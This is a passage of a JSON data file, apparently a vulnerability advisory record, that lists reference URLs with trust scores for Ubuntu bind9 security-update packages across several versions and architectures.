            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.4-2ubuntu2.3_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.2-2ubuntu1.5_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.4.2-10ubuntu0.1_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libdns32_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns22_9.3.4-2ubuntu2.3_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-p1-3ubuntu2_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_lpia.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.4.1-p1-3ubuntu2_all.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-p1.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_amd64.deb"
          },
          {
            "trust": 0.1,
